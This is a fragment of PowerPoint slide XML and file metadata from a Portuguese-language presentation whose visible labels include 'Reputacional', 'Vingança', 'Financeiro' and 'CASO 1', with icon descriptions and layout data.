            <a:ext cx="1946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"/>
              </a:rPr>
              <a:t>/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ublic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lucas-fp</a:t>
            </a:r>
            <a:endParaRPr sz="9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ublic Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Google Shape;169;p25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D22DE8A1-A7EC-5958-D027-D03BFD2D44C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91120" y="2677469"/>
            <a:ext cx="396204" cy="39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EE22811-76F7-EA84-47D1-A8EFFBE19A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5557" y="3740740"/>
            <a:ext cx="2589399" cy="25601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>
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C77A003-345A-04E8-BDAE-7926FAAB0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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{407D8769-D0D9-49A0-584C-320945B8FF45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2992850" y="1271016"/>
            <a:ext cx="8861700" cy="2901842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5" descr="Forma&#10;&#10;O conteúdo gerado por IA pode estar incorreto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7514FECC-BFC4-80FE-3E60-E8BF93AE10D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35708" y="660309"/>
            <a:ext cx="4460723" cy="25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 descr="Forma, Retângulo&#10;&#10;O conteúdo gerado por IA pode estar incorreto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F656742-FAE5-633B-3D73-1E7C99BC901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70025" y="660309"/>
            <a:ext cx="5129358" cy="202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 descr="Logotipo&#10;&#10;O conteúdo gerado por IA pode estar incorreto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0D35617-9F43-1B7A-F7B9-7930A431299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424" y="1194537"/>
            <a:ext cx="3430462" cy="86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9279DD32-CD93-113B-BC6F-7598C831A5C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48350" y="2685143"/>
            <a:ext cx="3302636" cy="55154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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C052E4E8-E692-551F-0C90-6F40D865024A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4615724" y="1520511"/>
            <a:ext cx="176004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Reputacional</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Gráfico 2" descr="Gráfico de tendência descendente com preenchimento sólido">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22311C1A-48E8-F9A8-85BC-4DEEDAF88B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3579" y="1947621"/>
            <a:ext cx="2074758" cy="207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1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>
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DA52B19-111A-E661-397D-1622C121F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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07DD76A2-5B8E-F87B-D9F3-8561EBB308C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2992850" y="1271016"/>
            <a:ext cx="8861700" cy="2901842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5" descr="Forma&#10;&#10;O conteúdo gerado por IA pode estar incorreto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{555EAC87-2F8A-742A-9FC8-1EBA6CB507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35708" y="660309"/>
            <a:ext cx="4460723" cy="25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3DDE658-3AD7-F3B7-BC77-F8A385F45E1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70025" y="660309"/>
            <a:ext cx="5129358" cy="202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 descr="Logotipo&#10;&#10;O conteúdo gerado por IA pode estar incorreto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8A9C468-560A-EDAB-EA50-E9A43098378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424" y="1194537"/>
            <a:ext cx="3430462" cy="86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44817BF9-4B25-7197-FCDF-390E95C141D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48350" y="2685143"/>
            <a:ext cx="3302636" cy="55154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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B6CE258-8D83-F66A-200D-DF61FB163B7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4615724" y="1520511"/>
            <a:ext cx="176004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Reputacional</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Gráfico 2" descr="Gráfico de tendência descendente com preenchimento sólido">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{884B6923-2253-599A-B049-F90637405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3579" y="1947621"/>
            <a:ext cx="2074758" cy="2074758"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Gráfico 4" descr="Contorno de rosto irritado com preenchimento sólido">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24DE6C4B-B5B4-8A52-683D-45AA457155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2655" y="2064463"/>
            <a:ext cx="1987297" cy="1987297"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5919F481-4216-39FF-4ADD-25670134FB1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7184431" y="1520511"/>
            <a:ext cx="1280153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Vingança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1983424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>
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA6FA6D2-8318-DBB2-EFB9-EA13A7E2A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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD0A9E3D-C827-CC0A-9F3B-616E53EAE23C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2992850" y="1271016"/>
            <a:ext cx="8861700" cy="2901842"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 266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5" descr="Forma&#10;&#10;O conteúdo gerado por IA pode estar incorreto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9EC1759-EEEE-58F7-7159-5AE399DF236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35708" y="660309"/>
            <a:ext cx="4460723" cy="25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 descr="Forma, Retângulo&#10;&#10;O conteúdo gerado por IA pode estar incorreto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53B1DBAD-605B-A6E2-FC40-35D350B513F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70025" y="660309"/>
            <a:ext cx="5129358" cy="202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 descr="Logotipo&#10;&#10;O conteúdo gerado por IA pode estar incorreto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3EE90B3-C291-AE8C-C6FA-75AA5EAD14C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424" y="1194537"/>
            <a:ext cx="3430462" cy="86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B9A5ABAA-2F7A-E392-FA16-E56384A9F1D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48350" y="2685143"/>
            <a:ext cx="3302636" cy="55154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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63F29727-B783-D84A-5640-EEB357A47611}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4615724" y="1520511"/>
            <a:ext cx="176004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Reputacional</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Gráfico 2" descr="Gráfico de tendência descendente com preenchimento sólido">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FB15651-5A3A-70B9-87F5-B6EEAE359A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3579" y="1947621"/>
            <a:ext cx="2074758" cy="2074758"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Gráfico 4" descr="Contorno de rosto irritado com preenchimento sólido">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7637272C-9AAF-5F9F-B0CD-A79E572D0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2655" y="2064463"/>
            <a:ext cx="1987297" cy="1987297"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF83DBF4-6F22-5D28-A998-7BF10F9F399C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7184431" y="1520511"/>
            <a:ext cx="1280153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Vingança</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Gráfico 7" descr="Dinheiro com preenchimento sólido">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26EA2872-CF89-A90C-2284-6DCDBFBF98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92889" y="2105961"/>
            <a:ext cx="1914145" cy="1914145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E229779E-5880-2586-4A12-F385EC628D32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9479642" y="1520510"/>
            <a:ext cx="151144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Financeiro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672389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1865F68B-3D7D-3D4C-7463-D47E6FD20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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CDF20FC-91D7-3E47-76D1-4CA44C1C610D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EEC5ABA0-34F8-4385-01CC-AF0FD9BD3EC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7996" y="5021943"/>
            <a:ext cx="2955897" cy="1531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EC0FAF2E-A79C-BD0C-8475-D5849F2E5F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386" y="275772"/>
            <a:ext cx="3039959" cy="1574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 descr="Forma&#10;&#10;O conteúdo gerado por IA pode estar incorreto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBB7E53D-0CA3-5D9C-ED95-0F63C451FD0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04629" y="1529298"/>
            <a:ext cx="6582741" cy="379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89C878F-2A60-6525-5EAA-B55891203B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8512" y="1673141"/>
            <a:ext cx="9114974" cy="359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Imagem gráfica de pessoa em pé&#10;&#10;O conteúdo gerado por IA pode estar incorreto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37710013-4C97-409B-EAB2-0906833A6B9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63494" y="1529298"/>
            <a:ext cx="3662266" cy="61160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7;p3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5C6BD42-B64E-DCE8-8258-E034389F497F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3044928" y="2364250"/>
            <a:ext cx="6102141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pt-BR" sz="13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lgerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
                <a:ea typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Public Sans Medium"/>
              </a:rPr>
              <a:t>CASO 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23637229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3f2ad7fe-a23f-4152-a4ea-514a6c2d1f68}" enabled="1" method="Privileged" siteId="{074d2f9c-d856-4b2e-84e8-0e13ba19100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4123</TotalTime>
  <Words>2479</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>230</Paragraphs>
  <Slides>50</Slides>
  <Notes>50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9" baseType="lpstr">
      <vt:lpstr>Biome Light</vt:lpstr>
      <vt:lpstr>Play</vt:lpstr>
      <vt:lpstr>Algerian</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Open Sans</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Open Sans ExtraBold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Lucas Rauschkolb</dc:creator>
  <cp:lastModifiedBy>LUCAS PIASENTIN</cp:lastModifiedBy>
  <cp:revision>42</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-30T15:13:51Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-24T16:44:52Z</dcterms:modified>
</cp:coreProperties>
</file>